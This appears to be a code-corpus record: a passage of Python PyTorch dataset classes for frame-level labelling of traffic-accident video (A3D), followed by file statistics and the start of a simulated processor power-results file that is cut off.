                imgx = cv2.resize(imgx, dsize=(0, 0), fx=sc, fy=sc)
                imgy = cv2.resize(imgy, dsize=(0, 0), fx=sc, fy=sc)
            imgx = (imgx / 255.) * 2 - 1
            imgy = (imgy / 255.) * 2 - 1
            img = np.asarray([imgx, imgy]).transpose([1, 2, 0])
            frames.append(img)
        return np.asarray(frames, dtype=np.float32)
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
            tuple: (imgs, label, vid, start, end) for the indexed clip.
"""
data = self.data[index]
vid = data["vid"]
label = data["label"]
start = data["start"]
end = data["end"]
if os.path.exists(os.path.join(self.save_dir, vid+'.npy')):
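            # features for this clip were already extracted to save_dir, so
            # return placeholders instead of decoding frames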
return 0, 0, vid
if self.mode == 'rgb':
imgs = self.load_rgb_frames(self.root, vid, start, end)
else:
imgs = self.load_flow_frames(self.root, vid, start, end)
imgs, label = self.transforms(imgs, label)
return imgs, label, vid, start, end
def __len__(self):
return len(self.data)
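# --- Usage sketch (editorial) ---
# Typical consumption of A3D with a PyTorch DataLoader; the json path, frame
# root, and `clip_transforms` below are hypothetical placeholders, and the
# transforms callable must accept and return an (imgs, label) pair as
# __getitem__ expects.
#
#   dataset = A3D(split_file='A3D_annotations.json', split='train',
#                 root='/data/A3D/frames', mode='rgb',
#                 transforms=clip_transforms, seq_len=16, overlap=0)
#   loader = data_utl.DataLoader(dataset, batch_size=8, shuffle=True,
#                                num_workers=4)
#   imgs, label, vid, start, end = next(iter(loader))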
class A3DBinary(data_utl.Dataset):
'''
A3D dataset for I3D binary classification
'''
def __init__(self,
split_file,
split,
root,
mode, transforms=None, horizontal_flip=None, save_dir='', seq_len=16, overlap=0):
self.split_file = split_file
self.transforms = transforms
self.mode = mode
self.root = root
self.save_dir = save_dir
self.seq_len = seq_len
self.overlap = overlap
self.fps = 10
self.num_classes = 2 # binary
if split == 'train':
self.data = self.make_train_dataset(split_file, split, root, mode)
print("Number of used video:", len(self.data))
elif split in ['val', 'test']:
self.data = self.make_test_dataset(split_file, split, root, mode)
def make_train_dataset(self, split_file, split, root, mode):
dataset = []
with open(split_file, 'r') as f:
data = json.load(f)
self.valid_videos = []
sample_category_stats = {'normal':0, 'abnormal': 0}
for idx, vid in enumerate(data.keys()):
            if data[vid]['video_start'] is None or \
                data[vid]['video_end'] is None or \
                data[vid]['anomaly_start'] is None or \
                data[vid]['anomaly_end'] is None:
                # NOTE: Sep 5, some videos have null annotation fields (an annotation bug); skip them for now
                continue
if data[vid]['subset'] != split:
continue
if not os.path.exists(os.path.join(root, vid)):
continue
num_frames = data[vid]['num_frames']
if num_frames < self.seq_len:
continue
print("Training videos:", vid)
self.valid_videos.append(vid)
# NOTE: this is for the temporal label
# init label
labels = np.zeros([2, num_frames], np.float32)
# normal label
labels[0, :data[vid]['anomaly_start']] = 1
# anomaly label
labels[1, data[vid]['anomaly_start']:data[vid]['anomaly_end']] = 1 # binary classification
# normal label
labels[0, data[vid]['anomaly_end']:] = 1
assert int(data[vid]['anomaly_class']) > 0
for t in range(0, num_frames, (self.seq_len - self.overlap)):
if num_frames - t < self.seq_len:
seq_start = num_frames - self.seq_len
seq_end = num_frames
else:
seq_start = t
seq_end = t + self.seq_len
# label = labels[:, seq_start: seq_end]
# NOTE: for original I3D, one clip has only one label
label = np.zeros(2, np.float32)
# NOTE: method 1, assign the label of the middle frame
# middle_idx = int(seq_end-seq_start/2)
# if middle_idx >= data[vid]['anomaly_start'] and middle_idx < data[vid]['anomaly_end']:
# label[int(data[vid]['anomaly_class'])] = 1 # abnormal
# sample_category_stats[int(data[vid]['anomaly_class'])] += 1
# else:
# label[0] = 1 # normal
# sample_category_stats[0] += 1
# NOTE: method 2, assign the accident label if over 1/3 of the frames are abnormal
if sum(labels[:, seq_start:seq_end].nonzero()[0] > 0) >= self.seq_len/3:
label[1] = 1 # abnormal
sample_category_stats['abnormal'] += 1
else:
label[0] = 1 # normal
sample_category_stats['normal'] += 1
dataset.append({"vid": vid,
"label": label,
"start": seq_start, # NOTE: 0-index
"end": seq_end,# NOTE: 0-index
# "image_dir":
})
# if mode == 'flow':
# num_frames = num_frames//2
            # NOTE: limit to the first 10 videos, for overfitting experiments
            if idx >= 9:
                break
print("Number of samples of all categories:")
print(sample_category_stats)
return dataset
def make_test_dataset(self, split_file, split, root, mode):
dataset = []
with open(split_file, 'r') as f:
data = json.load(f)
self.valid_videos = []
for idx, vid in enumerate(data.keys()):
            if data[vid]['video_start'] is None or \
                data[vid]['video_end'] is None or \
                data[vid]['anomaly_start'] is None or \
                data[vid]['anomaly_end'] is None:
                # NOTE: Sep 5, some videos have null annotation fields (an annotation bug); skip them for now
                continue
# if data[vid]['subset'] != split:
# continue
if not os.path.exists(os.path.join(root, vid)):
continue
if int(data[vid]['anomaly_class']) == 10:
# skip unknown
continue
print("Validating videos:", vid)
num_frames = data[vid]['num_frames']
self.valid_videos.append(vid)
# NOTE: for original I3D, one clip has only one label
label = np.zeros(2, np.float32)
label[1] = 1
dataset.append({"vid": vid,
"label": label,
"start": 0, # NOTE: 0-index
"end": num_frames# NOTE: 0-index
})
# if mode == 'flow':
# num_frames = num_frames//2
            if idx >= 9:
                break
return dataset
def load_rgb_frames(self, image_dir, vid, start, end):
frames = []
for i in range(start, end):
# img = cv2.imread(os.path.join(image_dir, vid, 'images', str(i).zfill(6)+'.jpg'))[:, :, [2, 1, 0]]
img = Image.open(os.path.join(image_dir, vid, 'images', str(i).zfill(6)+'.jpg'))
frames.append(img)
return frames #torch.stack(frames, dim=1)
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
            tuple: (imgs, label, vid, start, end) for the indexed clip.
"""
data = self.data[index]
vid = data["vid"]
label = data["label"]
start = data["start"]
end = data["end"]
if os.path.exists(os.path.join(self.save_dir, vid+'.npy')):
return 0, 0, vid
if self.mode == 'rgb':
imgs = self.load_rgb_frames(self.root, vid, start, end)
else:
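            # NOTE: A3DBinary defines no load_flow_frames of its own; 'flow'
            # mode assumes the A3D method above is ported to this class as well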
imgs = self.load_flow_frames(self.root, vid, start, end)
imgs, label = self.transforms(imgs, label)
return imgs, label, vid, start, end
def __len__(self):
return len(self.data) | 39.135255 | 122 | 0.489348 | 2,106 | 17,650 | 3.962963 | 0.107312 | 0.046969 | 0.063743 | 0.028517 | 0.870836 | 0.866283 | 0.860053 | 0.844237 | 0.844237 | 0.832135 | 0 | 0.021615 | 0.394504 | 17,650 | 451 | 123 | 39.135255 | 0.759334 | 0.248272 | 0 | 0.82963 | 0 | 0 | 0.073045 | 0.003618 | 0 | 0 | 0 | 0 | 0.007407 | 1 | 0.048148 | false | 0 | 0.044444 | 0.007407 | 0.148148 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d4282e431c03fd13ae8985db0714b048de67ff6f | 68,588 | py | Python | benchmarks/SimResults/_bigLittle_hrrs_splash_tugberk_locality/cmp_fmm/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/_bigLittle_hrrs_splash_tugberk_locality/cmp_fmm/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/_bigLittle_hrrs_splash_tugberk_locality/cmp_fmm/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.465677,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.568452,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 2.3614,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.980647,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.69813,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.973923,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 3.6527,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.607291,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 10.4338,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.44612,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0355492,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.437644,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.262908,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.883764,
'Execution Unit/Register Files/Runtime Dynamic': 0.298458,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 1.18511,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 2.32562,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 7.2506,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00333317,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00333317,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00288654,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00110833,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.0037767,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0133296,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0325526,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.25274,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.637436,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.85842,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.79448,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0210748,
'L2/Runtime Dynamic': 0.00574162,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.03428,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.34972,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0904949,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0904949,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.46336,
'Load Store Unit/Runtime Dynamic': 1.88651,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.223145,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.44629,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0791949,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0795098,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.104502,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.695406,
'Memory Management Unit/Runtime Dynamic': 0.184012,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 29.144,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.55641,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0688736,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.475743,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 2.10103,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 13.2224,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.140138,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.312759,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.710543,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.255201,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.411629,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.207776,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.874606,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.182939,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.45938,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.134237,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0107043,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.131751,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0791645,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.265988,
'Execution Unit/Register Files/Runtime Dynamic': 0.0898688,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.312605,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.617551,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.30016,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00125963,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00125963,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
